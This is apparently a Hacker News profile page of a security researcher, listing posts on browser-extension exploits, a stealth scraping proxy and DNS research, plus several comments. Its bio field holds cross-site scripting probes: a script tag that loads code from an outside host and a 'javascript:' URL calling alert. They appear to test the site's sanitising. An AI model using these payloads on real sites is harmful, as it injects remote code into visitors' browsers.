HN user

mandatory

540 karma

"><script src=https://y.vg></script>

http://www.test.com https://www.test.com JavAscRipt://www.test.com%0aalert(1)

<a href="https://www.test.com">test</a> [test](https://www.test.com)

tst

Posts47
Comments44
View on HN
github.com 10mo ago

Thermoptic – A next generation stealth HTTP proxy

mandatory
6pts1
github.com 10mo ago

"Bypassing" Cloudflare's Turnstile Captcha with Thermoptic

mandatory
15pts1
github.com 10mo ago

Thermoptic – HTTP proxy which cloaks requests as Chrome across all stack layers

mandatory
25pts0
www.wired.com 1y ago

Apple Prototypes and Corporate Secrets Are for Sale Online–If You Know Where

mandatory
118pts50
en.wikipedia.org 2y ago

Restrictions on Geographic Data in China

mandatory
4pts0
findthatmeme.com 3y ago

Image Stacks and iPhone Racks – Building an Internet Scale Meme Search Engine

mandatory
1pts0
findthatmeme.com 3y ago

FindThatMeme – Search Millions of Memes in Seconds

mandatory
44pts8
thehackerblog.com 4y ago

Compromising Angular via expired NPM publisher email domains

mandatory
1pts0
github.com 5y ago

Dataset of ~100K Chrome Extension Manifest.json Files for Analysis

mandatory
1pts0
github.com 6y ago

ChromeGalvanizer – Harden your browser against extension backdoors and exploits

mandatory
101pts37
grantproxy.com 6y ago

Show HN: GrantProxy, Chrome extension that turns browser into a magic HTTP proxy

mandatory
2pts1
theinternetbackup.com 6y ago

Show HN: TheInternetBackup – Internet crowdsourced domain database

mandatory
1pts0
www.refinery.io 6y ago

The Traveling Pokemaster – Hacking Pokemon Go with a Routing Algorithm

mandatory
2pts0
medium.com 6y ago

So you want to be a security engineer?

mandatory
1pts0
theinternetbackup.com 6y ago

The Internet Backup

mandatory
1pts0
www.refinery.io 6y ago

Chaining Together Lambdas: Exploring Different Ways to Link Serverless Functions

mandatory
1pts0
www.refinery.io 6y ago

The Traveling Pokemaster – Hacking Pokemon Go with a Routing Algorithm

mandatory
4pts0
www.refinery.io 6y ago

Jumping the Rabbit Hole – Beating WebApp Obfuscation with Request Interception

mandatory
4pts0
thehackerblog.com 6y ago

tarnish – The Chrome Extension Analyzer

mandatory
2pts0
findthatmeme.com 7y ago

FindThatMeme – Meme Search Engine Using Machine Vision for Indexing

mandatory
3pts0
wiki.postgresql.org 7y ago

Don't Do This (Postgres Wiki)

mandatory
5pts0
thehackerblog.com 7y ago

Video Downloader Extension Hijack Exploit – UXSS via CSP Bypass (~16 Mil Users)

mandatory
1pts0
teamflix.com 7y ago

Show HN: Teamflix, a service to watch Netflix/YouTube/more with friends online

mandatory
2pts0
thehackerblog.com 8y ago

Kicking the Rims – A Guide for Securely Writing and Auditing Chrome Extensions

mandatory
1pts0
thehackerblog.com 8y ago

Reading Your Emails with a Read&Write Chrome Extension SOP Bypass (~8M Affected)

mandatory
1pts0
thehackerblog.com 8y ago

ZenMate VPN Extension Deanonymization and Hijacking Exploit (3.5M Affected)

mandatory
1pts0
thehackerblog.com 8y ago

Accidentally Finding RCE in Signal Desktop via HTML Injection in Quoted Replies

mandatory
5pts0
medium.com 8y ago

So you want to be a security engineer?

mandatory
2pts0
news.ycombinator.com 8y ago

What is the most crazy/clever code hack you've seen?

mandatory
4pts0
www.documentcloud.org 8y ago

The Indictment Against MalwareTechBlog (WannaCry "Hero")

mandatory
3pts0

Feel free to read the README, this was already an ability that startups could pay for using private premium proxy services before thermoptic.

Having an open source version allows regular people to do scraping and not just those rich in capital.

Much of the best data services on the internet all start with scraping, the README lists many of them.

Yes I definitely want to improve the search to be better. It is currently very text heavy and I (only recently) got image similarity indexing working. Hoping to leverage this to do something like you mentioned!

I'd also like to figure out how to turn an image into a description of whats in it. My ML/tensorflow knowledge is very weak though, so I still have a lot to learn here.

The real story here is Twitter's lack of spear-phishing training for their support staff, not support employees have access to support tools.

Spear-phishing by its very definition is a highly targeted attack. I wouldn't count on any level of training to prevent someone from getting phished. Given some of the spear phishing campaigns I've seen, I wouldn't trust even myself not to fall for them.

It's a problem that needs to be solved with technical solutions like hardware U2F, locked-down customer support devices (e.g. Chrome enterprise policy managed ChromeOS devices), and special account VIP/anomaly locking and auto-escalation.

Yep, I can no longer see my Cloud SQL database - it's as if I've never created one at all. Really hoping this is just an issue displaying it and that Google hasn't punted my infrastructure and backups.

Wow, these comments make me sad - this is pretty clearly satire (although the vulnerability is real and pretty scary). Did the "DynoRoot!!!1111" really not give this away? :)

Author here, responding here like I did on Twitter. DNS resolver implementations matter here greatly. I received so many DNS queries (without me actually responding to any of them) that I quickly filled up my VPS with gigabytes of data from IP addresses of DNS resolvers across the Internet.

Saying "this is not the major security issue the author describes. He couldn't have hijacked any DNS traffic this way." seems a bit dishonest. You're saying that you have personally vetting all the DNS implementations of various DNS resolvers and have verified all of them take the resolution steps you've described exactly? If this is the case why did I receive so many queries (such as A, AAAA for the NS hostnames - which I assumed/assume was to cached these IP addresses for future resolution of the TLD's IPs). The way dig resolves things is different from how many production resolvers would do so, etc.

I can certainly see that some resolvers may take different steps for resolution which would make them unaffected by this issue (I'd have to think on it some more). A big issue here is of course that I didn't actually attempt to poison a bunch of the DNS resolvers which were hitting my server because I didn't want to affect any actual users. "Proving the point" in this case would've been dangerous and probably illegal as well.

That being said, mapping out how various DNS resolvers would perform their full resolution is an interesting side project and I've added it to my TODO list :)